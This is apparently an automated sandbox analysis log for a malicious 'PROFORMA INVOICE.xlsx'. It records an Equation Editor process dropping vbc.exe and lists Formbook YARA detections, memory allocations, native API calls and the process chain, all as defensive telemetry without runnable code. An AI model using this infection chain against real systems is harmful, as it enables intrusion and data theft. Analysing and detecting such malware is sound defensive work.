Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A50F3F	12_2_00A50F3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A6DF7C	12_2_00A6DF7C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_0009C9A5	12_2_0009C9A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00088C7B	12_2_00088C7B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00088C80	12_2_00088C80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00082D87	12_2_00082D87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00082D90	12_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00082FB0	12_2_00082FB0

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00A8373B appears 238 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00A83F92 appears 108 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00A3E2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00AAF970 appears 81 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00A3DF5C appears 118 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00CA3F92 appears 116 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00CA373B appears 228 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00C5E2A8 appears 59 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00CCF970 appears 80 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00C5DF5C appears 117 times

Source: C:\Users\Public\vbc.exe	Code function: 9_2_004185E0 NtCreateFile,	9_2_004185E0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00418690 NtReadFile,	9_2_00418690
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00418710 NtClose,	9_2_00418710
Source: C:\Users\Public\vbc.exe	Code function: 9_2_004187C0 NtAllocateVirtualMemory,	9_2_004187C0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_004187C2 NtAllocateVirtualMemory,	9_2_004187C2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C500C4 NtCreateFile,LdrInitializeThunk,	9_2_00C500C4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C50048 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_00C50048
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C50078 NtResumeThread,LdrInitializeThunk,	9_2_00C50078
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C507AC NtCreateMutant,LdrInitializeThunk,	9_2_00C507AC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4F9F0 NtClose,LdrInitializeThunk,	9_2_00C4F9F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4F900 NtReadFile,LdrInitializeThunk,	9_2_00C4F900
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_00C4FAD0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FAE8 NtQueryInformationProcess,LdrInitializeThunk,	9_2_00C4FAE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FBB8 NtQueryInformationToken,LdrInitializeThunk,	9_2_00C4FBB8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FB68 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_00C4FB68
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FC90 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_00C4FC90
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FC60 NtMapViewOfSection,LdrInitializeThunk,	9_2_00C4FC60
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FDC0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_00C4FDC0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FD8C NtDelayExecution,LdrInitializeThunk,	9_2_00C4FD8C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_00C4FED0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FEA0 NtReadVirtualMemory,LdrInitializeThunk,	9_2_00C4FEA0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FFB4 NtCreateSection,LdrInitializeThunk,	9_2_00C4FFB4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C510D0 NtOpenProcessToken,	9_2_00C510D0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C50060 NtQuerySection,	9_2_00C50060
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C501D4 NtSetValueKey,	9_2_00C501D4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C51148 NtOpenThread,	9_2_00C51148
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C5010C NtOpenDirectoryObject,	9_2_00C5010C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4F8CC NtWaitForSingleObject,	9_2_00C4F8CC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C51930 NtSetContextThread,	9_2_00C51930
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4F938 NtWriteFile,	9_2_00C4F938
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FAB8 NtQueryValueKey,	9_2_00C4FAB8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FA50 NtEnumerateValueKey,	9_2_00C4FA50
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FA20 NtQueryInformationFile,	9_2_00C4FA20
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FBE8 NtQueryVirtualMemory,	9_2_00C4FBE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FB50 NtCreateKey,	9_2_00C4FB50
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C50C40 NtGetContextThread,	9_2_00C50C40
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FC48 NtSetInformationFile,	9_2_00C4FC48
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FC30 NtOpenProcess,	9_2_00C4FC30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C51D80 NtSuspendThread,	9_2_00C51D80
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C4FD5C NtEnumerateKey,	9_2_00C4FD5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A300C4 NtCreateFile,LdrInitializeThunk,	12_2_00A300C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A307AC NtCreateMutant,LdrInitializeThunk,	12_2_00A307AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2F9F0 NtClose,LdrInitializeThunk,	12_2_00A2F9F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2F900 NtReadFile,LdrInitializeThunk,	12_2_00A2F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FAB8 NtQueryValueKey,LdrInitializeThunk,	12_2_00A2FAB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk,	12_2_00A2FAE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_00A2FAD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FBB8 NtQueryInformationToken,LdrInitializeThunk,	12_2_00A2FBB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_00A2FB68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FB50 NtCreateKey,LdrInitializeThunk,	12_2_00A2FB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FC60 NtMapViewOfSection,LdrInitializeThunk,	12_2_00A2FC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FD8C NtDelayExecution,LdrInitializeThunk,	12_2_00A2FD8C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_00A2FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_00A2FED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FFB4 NtCreateSection,LdrInitializeThunk,	12_2_00A2FFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A310D0 NtOpenProcessToken,	12_2_00A310D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A30060 NtQuerySection,	12_2_00A30060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A30078 NtResumeThread,	12_2_00A30078
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A30048 NtProtectVirtualMemory,	12_2_00A30048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A301D4 NtSetValueKey,	12_2_00A301D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A3010C NtOpenDirectoryObject,	12_2_00A3010C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A31148 NtOpenThread,	12_2_00A31148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2F8CC NtWaitForSingleObject,	12_2_00A2F8CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A31930 NtSetContextThread,	12_2_00A31930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2F938 NtWriteFile,	12_2_00A2F938
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FA20 NtQueryInformationFile,	12_2_00A2FA20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FA50 NtEnumerateValueKey,	12_2_00A2FA50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FBE8 NtQueryVirtualMemory,	12_2_00A2FBE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FC90 NtUnmapViewOfSection,	12_2_00A2FC90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FC30 NtOpenProcess,	12_2_00A2FC30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A30C40 NtGetContextThread,	12_2_00A30C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FC48 NtSetInformationFile,	12_2_00A2FC48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A31D80 NtSuspendThread,	12_2_00A31D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FD5C NtEnumerateKey,	12_2_00A2FD5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FEA0 NtReadVirtualMemory,	12_2_00A2FEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FE24 NtWriteVirtualMemory,	12_2_00A2FE24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FFFC NtCreateProcessEx,	12_2_00A2FFFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A2FF34 NtQueueApcThread,	12_2_00A2FF34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_000985E0 NtCreateFile,	12_2_000985E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00098690 NtReadFile,	12_2_00098690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00098710 NtClose,	12_2_00098710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_000987C0 NtAllocateVirtualMemory,	12_2_000987C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_000987C2 NtAllocateVirtualMemory,	12_2_000987C2

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: nLOlOTZpUHFzC.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PROFORMA INVOICE.xlsx

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@12/26@7/6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: PROFORMA INVOICE.xlsx

ReversingLabs: Detection: 31%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............$.......x.......).......................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............$.......x.......D.......................0.......#.......x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............$.......x.......u.......................0......./.......................(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............$.......x...............................0......./.......x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............$.......................................0.......;...............\|.......(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............$.......................................0.......;.......x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......x.......".......(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.............$.......................................0.......G.......x...............(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............$...............D.......................0.......S.......................(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............$..............._.......................0.......S.......x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......U.H.F.z.C...e.x.e.......$.......................................0......._.......x...............(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.............$.......................................0......._.......x...............(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............$.......................................0.......k.......................(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............$.......................................0.......k.......x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............$...............(.......................0.......w.......x...............(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$...............P.......................0.......................l.......(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$...............o.......................0...............x...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............$.......T...............................0...............x...............(...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......T...............................0...............x...............(...............	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................ .......................(.P.............<.......................................................................................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
